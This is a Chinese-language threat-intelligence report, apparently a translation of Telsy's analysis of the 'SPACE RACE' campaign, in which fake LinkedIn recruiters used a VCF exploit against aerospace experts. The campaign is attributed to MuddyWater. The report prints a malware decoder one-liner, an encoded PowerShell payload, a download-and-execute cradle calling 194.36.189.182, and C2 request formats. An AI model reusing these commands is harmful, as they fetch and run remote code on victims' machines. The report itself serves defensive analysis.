SPACE RACE攻击行动

2020年5月初，Telsy分析了一些针对航空航天和航空电子领域的攻击活动，攻击者通过流行的职场社交网络LinkedIn对个人进行社会工程学攻击。根据Telsy研究人员的观测，该攻击行动，针对的是意大利的航空航天研究领域中具有高知名度的专家。

攻击者利用真实的LinkedIn虚拟身份，伪装成一家卫星图像公司的人力资源招聘人员，并通过私发消息与目标联系，邀请他们下载一个假的工作信息附件，而下载的文件实际上是包含一个vCard文件（VCF）和名为http文件夹的压缩包。

打开后，.vcf文件如下所示：

如前所述，攻击者还加入了一些在卫星图像（[email protected]）和地理空间服务（BDLI）公司的相关资料，以获得受害者的信任。

其感染链非常复杂，由基于Powershell脚本和可执行文件的许多阶段组成，最终还植入了一个功能强大且以前没有发现的RAT（远程管理工具）。

根据其特定的目标、社会工程手段的准确性以及感染链的中等复杂性，Telsy认为这次攻击是由一个APT攻击组织发起的，该攻击组织对窃取航空航天领域的信息特别感兴趣。此外，基于被分析恶意软件代码的相似性，Telsy认为此次攻击事件，与Muddywater（又名Static Kitten或Mercury）攻击组织有关的可能性为中等。

VCF文件利用了去年的漏洞（ZDI-19-013，ZDI-CAN-6920），该漏洞允许在用户单击网站链接时执行本地文件。如上图所示，网站URL以“ http.\”开头，而不以“ http：//”开头，使用此技巧，攻击者能够引用本地http文件夹（此文件夹是与VCF文件一起发送的，名为“http”的压缩包解压出的）中的可执行文件，并将其命名为www.bdli-portal.com。单击这个链接，将会启动整个感染链。

该可执行文件的哈希为：

该文件由Python语言开发，通过PyInstaller打包成可执行程序，它的功能是用来下载后续的恶意模块。

当单击VCF链接后触发可执行文件时，它将打开浏览器，指向URL http://185.183.96.11/page，让受害者以为真的点击了网站。

但是，在后台，该恶意软件在％PROGRAMDATA％文件夹中写入一个名为Windows的新文件，其中包含编码的Powershell脚本，如下所示：

1041191121011181071131120341020420381070430341251161031181191161120340420930851231171181031110480861031221180480711121011131021071121050950600600670850690750750480731031180851181161071121050420930851231171181031110480691131121201031161180950600600721161131110680991171030560540851181161071121050420381070480841031141100991011030420410420410460410990410430480841031141100991011030420410430410460411000410430480841031141100991011030420411250410460411010410430480841031141100991011030420411270410460411020410430480841031141100991011030420410930410460411030410430480841031141100991011030420410950410460411040410430430430430611270611071031220421020421020420410881240670510430740510700800880840420890711131230

该文件的内容使用以下脚本进行解码和执行，即使在这种情况下也由Python可执行文件触发：

$a=get-content c:programdatawindows; del c:programdatawindows; $t = ''; for($i=0;$i -lt $a.Length;$i+=3){$t += [char](([int]($a[$i..($i+2)] -join ''))-2)}; iex($t);

最后，我们得到一个类似于下面的代码:

[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::TLS12;[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true}; $V=new-object net.webclient; $V.proxy=[Net.WebRequest]::GetSystemWebProxy(); $V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials; $V.Headers.Add("Cookie","X-BackEndCookie=S-1-5-21-2578815479-2326696314-4113358997-2544"); $s=$V.DownloadString('https://194.36.189.182:443/Default.aspx');iex($s)

此代码从 https://194.36.189.182:443/Default.aspx下载一个Powershell脚本。经过执行一系列的Powershell代码后，最终下载和执行了一个名为“ chrome.exe”的可执行文件。

此文件的哈希为：

 此恶意程序的静态信息如下：

“ chrome.exe”文件旨在下载最终的植入程序，并在受害系统的上下文中保持持久性。该可执行文件使用自定义算法，解密出与命令和控制（CnC）服务器（37.120.146.73）通信的字符串。

命令和控制通信通过ws2_32.dll的connect、send和recvfunctions来执行。用于发送以下GET HTTP请求:

GET /policy/xxx HTTP/1.1 Host: 37.120.146.73 Content-Length: 0

HTTP GET请求用于下载名为“ Poul.exe”的文件，并将其存储到C： ProgramData Updates文件夹。

此样本的哈希如下：

最后，恶意软件自行执行WinExec函数。

该恶意程序的静态信息如下：

在这个可执行文件中，主要的代码是用来与命令和控制(Cnc)服务器通信的，这是之前上文提到的代码。

恶意软件通过收集用来被命令和控制（CnC）服务器识别的信息，来制作受害机器的指纹，从而使其能够接收随后执行的命令。

网络通信通过HTTP POST请求进行。下面是其通信的一个例子:

POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 37.120.146.73Content-Length: 170 id=ZnJhbmNlc2NvJjE5Mi4xNjguMi4xMjgmMDA6MEM6Mjk6RDQ6QkI6ODMmV29ya2dyb3Vw&page=192.168.2.128&valid=00:0C:29:D4:BB:83&name=user&search=Workgroup&sub=2020-05-08.14:33

请求主体包含以下字段:

• Page =受感染机器的本地IP地址

• Valid=受感染机器的MAC地址

• Name =受害者的用户名

• Search =受感染机器的工作组

• Id =上面列出的字段的串接，使用base64编码

如果CnC服务器认为此类信息与攻击行动相关，则使用字符串“result”进行响应。否则，它将以字符串“ nothing”响应。这两个字符串似乎都是base64编码的。

如果植入程序获得了“nothing”字符串，它将进入一个不执行任何恶意操作的无限睡眠循环。否则，如果它接收到字符串“result”，它将执行另一个网络请求(类似于上面提到的)，以便接收要执行的命令。

植入程序可以:

• 通过cmd.exe执行攻击者给出的命令：

• 编写和修改受害者文件系统中的文件，将新创建的文件存储到%TEMP%目录中，如下所示：

操作的结果通过后续HTTP POST请求发送，格式如下:

POST / HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 37.120.146.73Content-Length: 170 id=ZnJhbmNlc2NvJjE5Mi4xNjguMi4xMjgmMDA6MEM6Mjk6RDQ6QkI6ODMmV29ya2dyb3Vw&type=01/02&form=result of the command

其中：

• type = “ 01”表示结果属于命令执行。“ 02”表示修改/写入文件操作的结果。

• form = 包含命令的结果

• id = 与之前所述相同

命令和控制服务器发送字符串“okCli”作为响应，以表明请求已被正确接收和处理。

如以下证据所示，“ Chrome.exe”可确保HKEY_CURRENT_USER Software Microsoft Windows CurrentVersion Explorer User Shell Folders注册表项下的持久性设置是指向路径C： ProgramData Updates Poul.exe。通过这种方式，后期植入程序将在任何系统登录/重启的时候启动。

Telsy调查了一些代码和网络基础设施重叠的地方，发现了潜在的证据，表明这次行动背后的攻击组织可能是一个名为Muddywater（又名Static Kitten或Mercury）的组织。

实际上，在Telsy的研究活动中，已经提取并隔离出所分析组件和由社区链接到相关恶意软件之间的代码相似性。

具体来说，以下两个不同哈希的样本之间存在一些代码重叠

72f487068c704b6d636ddd87990e25ce8cd5940244e581063f4c54afa4438212（右侧）和

fbce320f360bd107ffac0251a83702f5108e089c51cc85b26ea33c9c714e921b（左侧）（分别在偏移量0x404243和0x401E36处）显示如下：

此外，Telsy内部恶意软件归因引擎显示了，总共有5个可以关联到同一个攻击者的指标。

此外，对网络基础设施的进一步调查发现网络与内部链接到同一攻击者的恶意IP地址（46.166.176.210）重叠，进而与域名“ corana.tk”重叠。

根据下图，Muddywater在以前的攻击中使用了该域名，在此攻击期间，该域名传递了ForeLord（又名DNSLord）植入程序。

根据报告的证据，Telsy在中等可信度下将有关威胁活动归因于名为Muddywater（又名Static Kitten或Mercury）的APT攻击组织。

本文为CNTIC编译，不代表本公众号观点，转载请保留出处与链接。

联系信息进入公众号后点击“论坛信息”可见。

本文始发于微信公众号（国家网络威胁情报共享开放平台）：SPACE RACE攻击行动